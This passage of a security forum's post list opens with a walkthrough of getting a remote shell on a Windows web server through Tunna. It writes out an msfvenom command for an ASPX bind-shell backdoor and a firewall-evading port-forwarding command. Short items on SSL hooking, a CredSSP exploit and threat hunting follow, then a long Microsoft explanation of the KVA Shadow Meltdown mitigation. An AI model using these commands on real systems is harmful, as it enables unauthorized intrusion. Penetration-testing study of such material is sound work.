payload on the server we want. But after writing this tool we searched google a little and found that a tool called Tunna was written for this exact purpose by a company called SECFORCE. So instead of reinventing the wheel by posting our own tool that didn’t get nearly as much love as the Tunna project did we’re going to show how Tunna is used in action with a bind shell. Systems setup Victim -> Windows 2012 server Attacker -> Some Linux Distro Prerequisites Ability to upload a shell to a webserver Setting up Tunna The first thing we need to do in order to setup Tunna is to clone the git repository. On the attacking machine run: git clone https://github.com/SECFORCE/Tunna In this project we have quite some files. The ones we are going to use are proxy.py and then the contents of webshells In order for Tunna to work we are first going to upload the webshell that will handle the proxy connection/port forwarding to the victim machine In the webshells folder you’ll find conn.aspx - Use whatever method or vulnerability you are exploiting to get it onto the machine. As for now we’re going to assume that the shell conn.aspx is placed on http://victim.com/conn.aspx Tunna is now setup and ready to use Generating a payload We’re now going to generate our backdoor which is a simple shell via metasploit. The shell is going to listen on localhost:12000 which could be any port on localhost as we’ll connect to it through Tunna As we want to run our shell on a windows server running ASPX, we are going to build our backdoor in ASPX format with the use of MSFVENOM We use the following command: msfvenom --platform Windows -a x64 -p windows/x64/shell/bind_tcp LPORT=12000 LHOST=127.0.0.1 -f aspx --out shell.aspx --platform Target platform -a Target architecture -p Payload to use LPORT what port to listen on, on target LHOST the IP of where we are listening -f the output format of the payload --out where to save the file After running this command we should now have shell.aspx In the same way that we uploaded conn.aspx we should upload shell.aspx. So now we assume that you have the following two files available: http://victim.com/conn.aspx http://victim.com/shell.aspx Launching the attack So everything is setup. Tunna is uploaded to the server and we have our backdoor ready. The first thing we’re going to do is go to http://victim.com/shell.aspx We can now see that our shell is listening on port 12000 on our attacking machine after running a netstat -na Now we go to our attacking machine. We need two things for connecting. The first is our proxy.py from Tunna, and the next is our metasploit console for connecting. First we forward the local port 10000 to port 12000 on the remote host with the following command: python proxy.py -u http://target.com/conn.aspx -l 10000 -r 12000 -v --no-socks -u - The target url with the path to the webshell uploaded -l - The local port to listen on, on the attacking machine -r - The remote port to connect to, on the victim machine -v - verbosity --no-socks - Do not create a socks proxy. Only port forwarding needed The output will look like the following when it awaits connections: The attacking machine now listens locally on port 10000 and we can connect to it through metasploit In order to do this we configure metasploit the following way: And after that is done we enter run. We should now get a shell: The Tunna status terminal will look like this: Conclusions A full TCP connection wrapped in HTTP in order to evade strict firewalls and the like. We could’ve exchanged our normal shell with anything we wanted to as Tunna simply forwards the port for us. Performance suggestions for projects like Tunna We’ve experienced with some performance upgrades to the tunna project. One thing that we did not like was the amount of HTTP GET/POST requests sent to and from the server. Our solution to this was to use Transfer-encoding: Chunked. This enabled us to open a GET request and recieve bytes whenever ready and then wait for the next read from the socket without ever closing the GET request. We researched many ways to do this over POST, towards the server but we could’nt seem to circumvent that web servers like apache had some internal buffering on chunks retrieved, that was set to 8192 bytes Sursa: http://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/
  9. Are nightmares of data breaches and targeted attacks keeping your CISO up at night? You know you should be hunting for these threats, but where do you start? Told in the style of the popular children's story spoof, this soothing bedtime tale will lead Li'l Threat Hunters through the first five hunts they should do to find bad guys and, ultimately, help their CISOs "Go the F*#k to Sleep." By David Bianco & Robert Lee Full Abstract & Presentation Materials: https://www.blackhat.com/us-17/briefi...
      • 2
      • Upvote
  10. Hooking Chrome’s SSL functions ON 26 FEBRUARY 2018 BY NYTROSECURITY The purpose of NetRipper is to capture functions that encrypt or decrypt data and send them through the network. This can be easily achieved for applications such as Firefox, where it is enough to find two DLL exported functions: PR_Read and PR_Write, but it is way more difficult for Google Chrome, where the SSL_Read and SSL_Write functions are not exported. The main problem for someone who wants to intercept such calls, is that we cannot easily find the functions inside the huge chrome.dll file. So we have to manually find them in the binary. But how can we do it? Chrome’s source code In order to achieve our goal, the best starting point might be Chrome’s source code. We can find it here: https://cs.chromium.org/ . It allows us to easily search and navigate through the source code. Articol complet: https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/
  11. 1. Stack based buffer overflow 2. Care e rezultatul acestui exploit?
  12. https://nytrosecurity.com/2018/03/31/netripper-at-blackhat-asia-arsenal-2018/
  13. From Public Key to Exploitation: Exploiting the Authentication in MS-RDP [CVE-2018-0886] In March 2013 Patch Tuesday, Microsoft released a patch for CVE-2018-0886, a critical vulnerability that was discovered by Preempt. This vulnerability can be classified as a logical remote code execution (RCE) vulnerability. The vulnerability consists of a design flaw in CredSSP, which is a Security Support Provider involved in the Microsoft Remote Desktop and Windows Remote Management (Including Powershell sessions). An attacker with complete Man in the Middle (MITM) control over such a session can abuse it to run an arbitrary code on the target server on behalf of the user! This vulnerability affects all windows versions. Download this white paper to learn: How Preempt Researchers found the vulnerability How we were able to exploit authentication in MS-RDP What you need to do to protect your organization Download now. Sursa: https://www.preempt.com/white-paper/from-public-key-to-exploitation-exploiting-the-authentication-in-ms-rdp-cve-2018-0886/
      • 1
      • Upvote
  14. KVA Shadow: Mitigating Meltdown on Windows swiat March 23, 2018 On January 3rd, 2018, Microsoft released an advisory and security updates that relate to a new class of discovered hardware vulnerabilities, termed speculative execution side channels, that affect the design methodology and implementation decisions behind many modern microprocessors. This post dives into the technical details of Kernel Virtual Address (KVA) Shadow which is the Windows kernel mitigation for one specific speculative execution side channel: the rogue data cache load vulnerability (CVE-2017-5754, also known as “Meltdown” or “Variant 3”). KVA Shadow is one of the mitigations that is in scope for Microsoft's recently announced Speculative Execution Side Channel bounty program. It’s important to note that there are several different types of issues that fall under the category of speculative execution side channels, and that different mitigations are required for each type of issue. Additional information about the mitigations that Microsoft has developed for other speculative execution side channel vulnerabilities (“Spectre”), as well as additional background information on this class of issue, can be found here. Please note that the information in this post is current as of the date of this post. Vulnerability description & background The rogue data cache load hardware vulnerability relates to how certain processors handle permission checks for virtual memory. Processors commonly implement a mechanism to mark virtual memory pages as owned by the kernel (sometimes termed supervisor), or as owned by user mode. While executing in user mode, the processor prevents accesses to privileged kernel data structures by way of raising a fault (or exception) when an attempt is made to access a privileged, kernel-owned page. This protection of kernel-owned pages from direct user mode access is a key component of privilege separation between kernel and user mode code. Certain processors capable of speculative out-of-order execution, including many currently in-market processors from Intel, and some ARM-based processors, are susceptible to a speculative side channel that is exposed when an access to a page incurs a permission fault. On these processors, an instruction that performs an access to memory that incurs a permission fault will not update the architecturalstate of the machine. However, these processors may, under certain circumstances, still permit a faulting internal memory load µop (micro-operation) to forward the result of the load to subsequent, dependent µops. These processors can be said to defer handling of permission faults to instruction retirement time. Out of order processors are obligated to “roll back” the architecturally-visible effects of speculative execution down paths that are proven to have never been reachable during in-program-order execution, and as such, any µops that consume the result of a faulting load are ultimately cancelled and rolled back by the processor once the faulting load instruction retires. However, these dependent µops may still have issued subsequent cache loads based on the (faulting) privileged memory load, or otherwise may have left additional traces of their execution in the processor’s caches. This creates a speculative side channel: the remnants of cancelled, speculative µops that operated on the data returned by a load incurring a permission fault may be detectable through disturbances to the processor cache, and this may enable an attacker to infer the contents of privileged kernel memory that they would not otherwise have access to. In effect, this enables an unprivileged user mode process to disclose the contents of privileged kernel mode memory. Operating system implications Most operating systems, including Windows, rely on per-page user/kernel ownership permissions as a cornerstone of enforcing privilege separation between kernel mode and user mode. A speculative side channel that enables unprivileged user mode code to infer the contents of privileged kernel memory is problematic given that sensitive information may exist in the kernel’s address space. Mitigating this vulnerability on affected, in-market hardware is especially challenging, as user/kernel ownership page permissions must be assumed to no longer prevent the disclosure (i.e., reading) of kernel memory contents from user mode. Thus, on vulnerable processors, the rogue data cache load vulnerability impacts the primary tool that modern operating system kernels use to protect themselves from privileged kernel memory disclosure by untrusted user mode applications. In order to protect kernel memory contents from disclosure on affected processors, it is thus necessary to go back to the drawing board with how the kernel isolates its memory contents from user mode. With the user/kernel ownership permission no longer effectively safeguarding against memory reads, the only other broadly-available mechanism to prevent disclosure of privileged kernel memory contents is to entirely remove all privileged kernel memory from the processor’s virtual address space while executing user mode code. This, however, is problematic, in that applications frequently make system service calls to request that the kernel perform operations on their behalf (such as opening or reading a file on disk). These system service calls, as well as other critical kernel functions such as interrupt processing, can only be performed if their requisite, privileged code and data are mapped in to the processor’s address space. This presents a conundrum: in order to meet the security requirements of kernel privilege separation from user mode, no privileged kernel memory may be mapped into the processor’s address space, and yet in order to reasonably handle any system service call requests from user mode applications to the kernel, this same privileged kernel memory must be quickly accessible for the kernel itself to function. The solution to this quandary is to, on transitions between kernel mode and user mode, also switch the processor’s address space between a kernel address space (which maps the entire user and kernel address space), and a shadow user address space (which maps the entire user memory contents of a process, but only a minimal subset of kernel mode transition code and data pages needed to switch into and out of the kernel address space). The select set of privileged kernel code and data transition pages handling the details of these address space switches, which are “shadowed” into the user address space are “safe” in that they do not contain any privileged data that would be harmful to the system if disclosed to an untrusted user mode application. In the Windows kernel, the usage of this disjoint set of shadow address spaces for user and kernel modes is called “kernel virtual address shadowing”, or KVA shadow, for short. In order to support this concept, each process may now have up to two address spaces: the kernel address space and the user address space. As there is no virtual memory mapping for other, potentially sensitive privileged kernel data when untrusted user mode code executes, the rogue data cache load speculative side channel is completely mitigated. This approach is not, however, without substantial complexity and performance implications, as will later be discussed. On a historical note, some operating systems previously have implemented similar mechanisms for a variety of different and unrelated reasons: For example, in 2003 (prior to the common introduction of 64-bit processors in most broadly-available consumer hardware), with the intention of addressing larger amounts of virtual memory on 32-bit systems, optional support was added to the 32-bit x86 Linux kernel in order to provide a 4GB virtual address space to user mode, and a separate 4GB address space to the kernel, requiring address space switches on each user/kernel transition. More recently, a similar approach, termed KAISER, has been advocated to mitigate information leakage about the kernel virtual address space layout due to processor side channels. This is distinct from the rogue data cache load speculative side channel issue, in that no kernel memory contents, as opposed to address space layout information, were at the time considered to be at risk prior to the discovery of speculative side channels. KVA shadow implementation in the Windows kernel While the design requirements of KVA shadow may seem relatively innocuous, (privileged kernel-mode memory must not be mapped in to the address space when untrusted user mode code runs) the implications of these requirements are far-reaching throughout Windows kernel architecture. This touches a substantial number of core facilities for the kernel, such as memory management, trap and exception dispatching, and more. The situation is further complicated by a requirement that the same kernel code and binaries must be able to run with and without KVA shadow enabled. Performance of the system in both configurations must be maximized, while simultaneously attempting to keep the scope of the changes required for KVA shadow as contained as possible. This maximizes maintainability of code in both KVA shadow and non-KVA-shadow configurations. This section focuses primarily on the implications of KVA shadow for the 64-bit x86 (x64) Windows kernel. Most considerations for KVA shadow on x64 also apply to 32-bit x86 kernels, though there are some divergences between the two architectures. This is due to ISA differences between 64-bit and 32-bit modes, particularly with trap and exception handling. Please note that the implementation details described in this section are subject to change without notice in the future. Drivers and applications must not take dependencies on any of the internal behaviors described below without first checking for updated documentation. The best way to understand the complexities involved with KVA shadow is to start with the underlying low-level interface in the kernel that handles the transitions between user mode and kernel mode. This interface, called the trap handling code, is responsible for fielding traps (or exceptions) that may occur from either kernel mode or user mode. It is also responsible for dispatching system service calls and hardware interrupts. There are several events that the trap handling code must handle, but the most relevant for KVA shadow are those called “kernel entry” and “kernel exit” events. These events, respectively, involve transitions from user mode into kernel mode, and from kernel mode into user mode. Trap handling and system service call dispatching overview and retrospective As a quick recap of how the Windows kernel dispatches traps and exceptions on x64 processors, traditionally, the kernel programs the current thread’s kernel stack pointer into the current processor’s TSS (task state segment), specifically into the KTSS64.Rsp0 field, which informs the processor which stack pointer (RSP) value to load up on a ring transition to ring 0 (kernel mode) code. This field is traditionally updated by the kernel on context switch, and several other related internal events; when a switch to a different thread occurs, the processor KTSS64.Rsp0 field is updated to point to the base of the new thread’s kernel stack, such that any kernel entry event that occurs while that thread is running enters the kernel already on that thread’s stack. The exception to this rule is that of system service calls, which typically enter the kernel with a “syscall” instruction; this instruction does not switch the stack pointer and it is the responsibility of the operating system trap handling code to manually load up an appropriate kernel stack pointer. On typical kernel entry, the hardware has already pushed what is termed a “machine frame” (internally, MACHINE_FRAME) on the kernel stack; this is the processor-defined data structure that the IRETQ instruction consumes and removes from the stack to effect an interrupt-return, and includes details such as the return address, code segment, stack pointer, stack segment, and processor flags on the calling application. The trap handling code in the Windows kernel builds a structure called a trap frame (internally, KTRAP_FRAME) that begins with the hardware-pushed MACHINE_FRAME, and then contains a variety of software-pushed fields that describe the volatile register state of the context that was interrupted. System calls, as noted above, are an exception to this rule, and must manually build the entire KTRAP_FRAME, including the MACHINE_FRAME, after effecting a stack switch to an appropriate kernel stack for the current thread. KVA shadow trap and system service call dispatching design considerations With a basic understanding of how traps are handled without KVA shadow, let’s dive into the details of the KVA shadow-specific considerations of trap handling in the kernel. When designing KVA shadow, several design considerations applied for trap handling when KVA shadow were active, namely, that the security requirements were met, that performance impact on the system was minimized, and that changes to the trap handling code were kept as compartmentalized as possible in order to simplify code and improve maintainability. For example, it is desirable to share as much trap handling code between the KVA shadow and non-KVA shadow configurations as practical, so that it is easier to make changes to the kernel’s trap handling facilities in the future. When KVA shadowing is active, user mode code typically runs with the user mode address space selected. It is the responsibility of the trap handling code to switch to the kernel address space on kernel entry, and to switch back to the user address space on kernel exit. However, additional details apply: it is not sufficient to simply switch address spaces, because the only transition kernel pages that can be permitted to exist (or be “shadowed into”) in the user address space are only those that hold contents that are “safe” to disclose to user mode. The first complication that KVA shadow encounters is that it would be inappropriate to shadow the kernel stack pages for each thread into the user mode address space, as this would allow potentially sensitive, privileged kernel memory contents on kernel thread stacks to be leaked via the rogue data cache load speculative side channel. It is also desirable to keep the set of code and data structures that are shadowed into the user mode address space to a minimum, and if possible, to only shadow permanent fixtures in the address space (such as portions of the kernel image itself, and critical per-processor data structures such as the GDT (Global Descriptor Table), IDT (Interrupt Descriptor Table), and TSS. This simplifies memory management, as handling setup and teardown of new mappings that are shadowed into user mode address spaces has associated complexities, as would enabling any shadowed mappings to become pageable. For these reasons, it was clear that it would not be acceptable for the kernel’s trap handling code to continue to use the per-kernel-thread stack for kernel entry and kernel exit events. Instead, a new approach would be required. The solution that was implemented for KVA shadow was to switch to a mode of operation wherein a small set of per-processor stacks (internally called KTRANSITION_STACKs) are the only stacks that are shadowed into the user mode address space. Eight of these stacks exist for each processor, the first of which represents the stack used for “normal” kernel entry events, such as exceptions, page faults, and most hardware interrupts, and the remaining seven transition stacks represent the stacks used for traps that are dispatched using the x64-defined IST (Interrupt Stack Table) mechanism (note that Windows does not use all 7 possible IST stacks presently). When KVA shadow is active, then, the KTSS64.Rsp0 field of each processor points to the first transition stack of each processor, and each of the KTSS64.Ist[n] fields point to the n-th KTRANSITION_STACK for that processor. For convenience, the transition stacks are located in a contiguous region of memory, internally termed the KPROCESSOR_DESCRIPTOR_AREA, that also contains the per-processor GDT, IDT, and TSS, all of which are required to be shadowed into the user mode address space for the processor itself to be able to handle ring transitions properly. This contiguous memory block is, itself, shadowed in its entirety. This configuration ensures that when a kernel entry event is fielded while KVA shadow is active, that the current stack is both shadowed into the user mode address space, and does not contain sensitive memory contents that would be risky to disclose to user mode. However, in order to maintain these properties, the trap dispatch code must be careful to push no sensitive information onto any transition stack at any time. This necessitates the first several rules for KVA shadow in order to avoid any other memory contents from being stored onto the transition stacks: when executing on a transition stack, the kernel must be fielding a kernel entry or kernel exit event, interrupts must be disabled and must remain disabled throughout, and the code executing on a transition stack must be careful to never incur any other type of kernel trap. This also implies that the KVA shadow trap dispatch code can assume that traps arising in kernel mode already are executing with the correct CR3, and on the correct kernel stack (except for some special considerations for IST-delivered traps, as discussed below). Fielding a trap with KVA shadow active Based on the above design decisions, there is an additional set of tasks specific to KVA shadowing that must occur prior to the normal trap handling code in the kernel being invoked for a kernel entry trap events. In addition, there is a similar set of tasks related to KVA shadow that must occur at the end of trap processing, if a kernel exit is occurring. On normal kernel entry, the following sequence of events must occur: The kernel GS base value must be loaded. This enables the remaining trap code to access per-processor data structures, such as those that hold the kernel CR3 value for the current processor. The processor’s address space must be switched to the kernel address space, so that all kernel code and data are accessible (i.e., the kernel CR3 value must be loaded). This necessitates that the kernel CR3 value must be stored in a location that is, itself, shadowed. For the purposes of KVA shadow, a single per-processor KPRCB page that contains only “safe” contents maintains a copy of the current processor’s kernel CR3 value for easy access to the KVA shadow trap dispatch code. Context switch between address spaces, and process attach/detach update the corresponding KPRCB fields with the new CR3 value on process address space changes. The machine frame previously pushed by hardware as a part of the ring transition from user mode to kernel mode must be copied from the current (transition) stack, to the per-kernel-thread stack for the current thread. The current stack must be switched to the per-kernel-thread stack. At this point, the “normal” trap handling code can largely proceed as usual, and without invasive modifications (save that the kernel GS base has already been loaded). Roughly speaking, the inverse sequence of events must occur on normal kernel exit; the machine frame at the top of the current kernel thread stack must be copied to the transition stack for the processor, the stacks must be switched, CR3 must be reloaded with the corresponding value for the user mode address space of the current process, the user mode GS base must be reloaded, and then control may be returned to user mode. System service call entry and exit through the SYSCALL/SYSRETQ instruction pair is handled slightly specially, in that the processor does not already push a machine frame, because the kernel logically does not have a current stack pointer until it explicitly loads one. In this case, no machine frame needs be copied on kernel entry and kernel exit, but the other basic steps must still be performed. Special care needs to be taken by the KVA shadow trap dispatch code for NMI, machine check, and double fault type trap events, because these events may interrupt even normally uninterruptable code. This means that they could even interrupt the normally uninterruptable KVA shadow trap dispatch code itself, during a kernel entry or kernel exit event. These types of traps are delivered using the IST mechanism onto their own distinct transition stacks, and the trap handling code must carefully handle the case of the GS base or CR3 value being in any state due to the indeterminate state of the machine at the time in which these events may occur, and must preserve the pre-existing GS base or CR3 values. At this point, the basics for how to enter and exit the kernel with KVA shadow are in place. However, it would be undesirable to inline the KVA shadow trap dispatch code into the standard trap entry and trap exit code paths, as the standard trap entry and trap exit code paths could be located anywhere in the kernel’s .text code section, and it is desirable to minimize the amount of code that needs be shadowed into the user address space. For this reason, the KVA shadow trap dispatch code is collected into a series of parallel entry points packed within their own code section within the kernel image, and either the standard set of trap entry points, or the KVA shadow trap entry points are installed into the IDT at system boot time, based on whether KVA shadow is in use at system boot. Similarly, the system service call entry points are also located in this special code section in the kernel image. Note that one implication of this design choice is that KVA shadow does not protect against attacks against kernel ASLR using speculative side channels. This is a deliberate decision given the design complexity of KVA shadow, timelines involved, and the realities of other side channel issues affecting the same processor designs. Notably, processors susceptible to rogue data cache load are also typically susceptible to other attacks on their BTBs (branch target buffers), and other microarchitectural resources that may allow kernel address space layout disclosure to a local attacker that is executing arbitrary native code. Memory management considerations for KVA shadow Now that KVA shadow is able to handle trap entry and trap exit, it’s necessary to understand the implications of KVA shadowing on memory management. As with the trap handling design considerations for KVA shadow, ensuring the correct security properties, providing good performance characteristics, and maximizing the maintainability of code changes were all important design goals. Where possible, rules were established to simplify the memory management design implementation. For example, all kernel allocations that are shadowed into the user mode address space are shadowed system-wide and not per-process or per-processor. As another example, all such shadowed allocations exist at the same kernel virtual address in both the user mode and kernel mode address spaces and share the same underlying physical pages in both address spaces, and all such allocations are considered nonpageable and are treated as though they have been locked into memory. The most apparent memory management consequence of KVA shadowing is that each process typically now needs a separate address space (i.e., page table hierarchy, or top level page directory page) allocated to describe the shadow user address space, and that the top level page directory entries corresponding to user mode VAs must be replicated from the process’s kernel address space top level page directory page to the process’s user address space top level page directory page. The top level page directory page entries for the kernel half of the VA space are not replicated, however, and instead only correspond to a minimal set of page table pages needed to map the small subset of pages that have been explicitly shadowed into the user mode address space. As noted above, pages that are shadowed into the user mode address space are left nonpageable for simplicity. In practice, this is not a substantial hardship for KVA shadow, as only a very small number of fixed allocations are ever shadowed system-wide. (Remember that only the per-processor transition stacks are shadowed, not any per-thread data structures, such as per-thread kernel stacks.) Memory management must then replicate any updates to top level user mode page directory page entries between the two process address spaces, as any updates occur, and access bit handling for working set aging and other purposes must logically OR the access bits from both user and kernel address spaces together if a top level page directory page entry is being considered (and, similarly, working set aging must clear access bits in both top level page directory page if a top level entry is being considered). Similarly, memory management must be aware of both address spaces that may exist for processes in various other edge-cases where top-level page directory pages are manipulated. Finally, no general purpose kernel allocations can be marked as “global” in their corresponding leaf page table entries by the kernel, because processors susceptible to rogue data cache load cannot observe any cached virtual address translations for any privileged kernel pages that could contain sensitive memory contents while in user mode, for KVA shadow protections to be effective, and such global entries would still be cached in the processor translation buffer (TB) across an address space switch. Booting is just the beginning of a journey At this point, we have covered some of the major areas involved in the kernel with respect to KVA shadow. However, there’s much more that’s involved beyond just trap handling and memory management: For example, changes to how Windows handles multiprocessor initialization, hibernate and resume, processor shutdown and reboot, and many other areas were all required in order to make KVA shadow into a fully featured solution that works correctly in all supported software configurations. Furthermore, preventing the rogue data cache load issue from exposing privileged kernel mode memory contents is just the beginning of turning KVA shadow into a feature that could be shipped to a diverse customer base. So far, we have only touched on the basics of the highlights of an unoptimized implementation of KVA shadow on x64 Windows. We’re far from done examining KVA shadowing, however; a substantial amount of additional work was still required in order to reduce the performance overhead of KVA shadow to the absolute minimum possible. As we’ll see, there are a number of options that have been considered and employed to that end with KVA shadow. The below optimizations are already included with the January 3rd, 2018 security updates to address rogue data cache load. Performance optimizations One of the primary challenges faced by the implementation of KVA shadow was maximizing system performance. The model of a unified, flat address space shared between user and kernel mode, with page permission bits to protect kernel-owned pages from access by unprivileged user mode code, is both convenient for an operating system kernel to implement, and easily amenable to high performance user/kernel transitions. The reason why the traditional, unified address space model allows for fast user/kernel transitions relates to how processors handle virtual memory. Processors typically cache previously fetched virtual address translations in a small internal cache that is termed a translation buffer, (or TB, for short); some literature also refers to these types of address translation caches as translation lookaside buffers (or TLBs for short). The processor TB operates on the principle of locality: if an application (or the kernel) has referenced a particular virtual address translation recently, it is likely to do so again, and the processor can save the costly process of re-walking the operating system’s page table hierarchy if the requisite translation is already cached in the processor TB. Traditionally, a TB contains information that is primarily local to a particular address space (or page table hierarchy), and when a switch to a different page table hierarchy occurs, such as with a context switch between threads in different processes, the processor TB must be flushed so that translations from one process are not improperly used in the context of a different process. This is critical, as two processes can, and frequently do, map the same user mode virtual address to completely different physical pages. KVA shadowing requires switching address spaces much more frequently than operating systems have traditionally done so, however; on processors susceptible to the rogue data cache load issue, it is now necessary to switch the address space on every user/kernel transition, which are vastly more frequent events than cross-process context switches. In the absence of any further optimizations, the fact that the processor TB is flushed and invalidated on each user/kernel transition would substantially reduce the benefit of the processor TB, and would represent a significant performance cost on the system. Fortunately, there are some techniques that the Windows KVA shadow implementation employs to substantially mitigate the performance costs of KVA shadowing on processor hardware that is susceptible to rogue data cache load. Optimizing KVA shadow for maximum performance presented a challenging exercise in finding creative ways to make use of existing, in-the-field hardware capabilities, sometimes outside the scope of their original intended use, while still maintaining system security and correct system operation, but several techniques have been developed to substantially reduce the cost. PCID acceleration The first optimization, the usage of PCID (process-context identifier) acceleration is relevant to Intel Core-family processors of Haswell and newer microarchitectures. While the TB on many processors traditionally maintained information local to an address space, and which had to be flushed on any address space switch, the PCID hardware capability allows address translations to be tagged with a logical PCID that informs the processor which address space they are relevant to. An address space (or page table hierarchy) can be tagged with a distinguished PCID value, and this tag is maintained with any non-global translations that are cached the processor’s TB; then, on address space switch to an address space with a different associated PCID, the processor can be instructed to preserve the previous TB contents. Because the processor requires that the current address space’s PCID to match that of any cached translation in the TB for the purposes of matching any translation lookups in the TB, address translations from multiple address spaces can now be safely represented concurrently in the processor TB. On hardware that is PCID-capable and which requires KVA shadowing, the Windows kernel employs two distinguished PCID values, which are internally termed PCID_KERNEL and PCID_USER. The kernel address space is tagged with PCID_KERNEL, and the user address space is tagged with PCID_USER, and on each user/kernel transition, the kernel will typically instruct the processor to preserve the TB contents when switching address spaces. This enables the preservation of the entire TB contents on system service calls and other high frequency user/kernel transitions, and in many workloads, substantially mitigates almost all of the cost of KVA shadowing. Some duplication of TB entries between user and kernel mode is possible if the same user mode VA is referenced by user and kernel code, and additional processing is also required on some types of TB flushes, as certain types of TB flushes (such as those that invalidate user mode VAs) must be replicated to both user and kernel PCIDs. However, this overhead is typically relatively minor compared to the loss of all TB entries if the entire TB were not preserved on each user/kernel transition. On address space switches between processes, such as context switches between two different processes, the entire TB is invalidated. This must be performed because the PCID values assigned by the kernel are not process-specific, but are global to the entire system. Assigning different PCID values to each process (which would be a more “traditional” usage of PCID) would preclude the need to flush the entire TB on context switches between processes, but would also require TB flush IPIs (interprocessor-interrupts) to be sent to a potentially much larger set of processors, specifically being all of those that had previously loaded a given PCID, which in and of itself is a performance trade-off due to the cost involved in TB flush IPIs. It’s important to note that PCID acceleration also requires the hypervisor to expose CR4.PCID and the INVPCID instruction to the Windows kernel. The Hyper-V hypervisor was updated to expose these capabilities with the January 3rd, 2018 security updates. Additionally, the underlying PCID hardware capability is only defined for the native 64-bit paging mode, and thus a 64-bit kernel is required to take advantage of PCID acceleration (32-bit applications running under a 64-bit kernel can still benefit from the optimization). User/global acceleration Although many modern processors can take advantage of PCID acceleration, older Intel Core family processors, and current Intel Atom family processors do not provide hardware support for PCID and thus cannot take advantage of that PCID support to accelerate KVA shadowing. These processors do allow a more limited form of TB preservation across address space switches, however, in the form of the “global” page table entry bit. The global bit allows the operating system kernel to communicate to the processor that a given leaf translation is “global” to the entire system, and need not be invalidated on address space switches. (A special facility to invalidate all translations including global translations is provided by the processor, for cases when the operating system changes global memory translations. On x64 and x86 processors, this is accomplished by toggling the CR4.PGE control register bit.) Traditionally, the kernel would mark most kernel mode page translations as global, in order to indicate that these address translations can be preserved in the TB during cross-process address space switches while all non-global address translations are flushed from the TB. The kernel is then obligated to ensure that both incoming and outgoing address spaces provide consistent translations for any global translations in both address spaces, across a global-preserving address space switch, for correct system operation. This is a simple matter for the traditional use of kernel virtual address management, as most of the kernel address space is identical across all processes. The global bit, thus, elegantly allows most of the effective TB contents for kernel VAs to be preserved across context switches with minimal hardware and software complexity. In the context of KVA shadow, however, the global bit can be used for a completely different purpose than its original intention, for an optimization termed “user/global acceleration”. Instead of marking kernel pages as global, KVA shadow marks user pages as global, indicating to the processor that all pages in the user mode half of the address space are safe to preserve across address space switches. While an address space switch must still occur on each user/kernel transition, global translations are preserved in the TB, which preserves the user TB entries. As most applications primarily spend their time executing in user mode, this mode of operation preserves the portion of the TB that is most relevant to most applications. The TB contents for kernel virtual addresses are unavoidably lost on each address space switch when user/global acceleration is in use, and as with PCID acceleration, some TB flushes must be handled differently (and cross-process context switches require an entire TB flush), but preserving the user TB contents substantially cuts the cost of KVA shadowing over the more naïve approach of marking no translations as global. Privileged process acceleration The purpose of KVA shadowing is to protect sensitive kernel mode memory contents from disclosure to untrusted user mode applications. This is required for security purposes in order to maintain privilege separation between kernel mode and user mode. However, highly-privileged applications that have complete control over the system are typically trusted by the operating system for a variety of tasks, up to and including loading drivers, creating kernel memory dumps, and so on. These applications effectively already have the privileges required in order to access kernel memory, and so KVA shadowing is of minimal benefit for these applications. KVA shadow thus optimizes highly privileged applications (specifically, those that have a primary token which is a member of the BUILTIN\Administrators group, which includes LocalSystem, and processes that execute as a fully-elevated administrator account) by running these applications only with the KVA shadow “kernel” address space, which is very similar to how applications execute on processors that are not susceptible to rogue data cache load. These applications avoid most of the overhead of KVA shadowing, as no address space switch occurs on user/kernel transitions. Because these applications are fully trusted by the operating system, and already have (or could obtain) the capability to load drivers that could naturally access kernel memory, KVA shadowing is not required for fully-privileged applications. Optimizations are ongoing The introduction of KVA shadowing radically alters how the Windows kernel fields traps and exceptions from a processor, and significantly changes several key aspects of memory management. While several high-value optimizations have already been deployed with the initial release of operating system updates to integrate KVA shadow support, research into additional avenues of improvement and opportunities for performance tuning continues. KVA shadow represents a substantial departure from some existing operating system design paradigms, and with any such substantial shift in software design, exploring all possible optimizations and performance tuning opportunities is an ongoing effort. Driver and application compatibility A key consideration of KVA shadow was that existing applications and drivers must continue to work. Specifically, it would not have been acceptable to change the Windows ABI, or to invalidate how drivers work with user mode memory, in order to integrate KVA shadow support into the operating system. Applications and drivers that use supported and documented interfaces are highly compatible with KVA shadow, and no changes to how drivers access user mode memory through supported and documented means are necessary. For example, under a try/except block, it is still possible for a driver to use ProbeForRead to probe a user mode address for validity, and then to copy memory from that user mode virtual address (under try/except protection). Similarly, MDL mappings to/from user mode memory still function as before. A small number of drivers and applications did, however, encounter compatibility issues with KVA shadow. By and large, the majority of incompatible drivers and applications used substantially unsupported and undocumented means to interface with the operating system. For example, Microsoft encountered several software applications from multiple software vendors that assumed that the raw machine instructions in certain, non-exported Windows kernel functions would remain static or unchanged with software updates. Such approaches are highly fragile and are subject to breaking at even slight perturbations of the operating system kernel code. Operating system changes like KVA shadow, that necessitated a security update which changed how the operating system manages memory and trap and exception dispatching, underscore the fragility of depending on highly unsupported and undocumented mechanisms in drivers and applications. Microsoft strongly encourages developers to use supported and documented facilities in drivers and applications. Keeping customers secure and up to date is a shared commitment, and avoiding dependencies on unsupported and undocumented facilities and behaviors is critical to meeting the expectations that customers have with respect to keeping their systems secure. Conclusion Mitigating hardware vulnerabilities in software is an extremely challenging proposition, whether you are an operating system vendor, driver writer, or an application vendor. In the case of rogue data cache load and KVA shadow, the Windows kernel is able to provide a transparent and strong mitigation for drivers and applications, albeit at the cost of additional operating system complexity, and especially on older hardware, at some potential performance cost depending on the characteristics of a given workload. The breadth of changes required to implement KVA shadowing was substantial, and KVA shadow support easily represents one of the most intricate, complex, and wide-ranging security updates that Microsoft has ever shipped. Microsoft is committed to protecting our customers, and we will continue to work with our industry partners in order to address speculative execution side channel vulnerabilities. Ken Johnson, Microsoft Security Response Center (MSRC) Sursa: https://blogs.technet.microsoft.com/srd/2018/03/23/kva-shadow-mitigating-meltdown-on-windows/
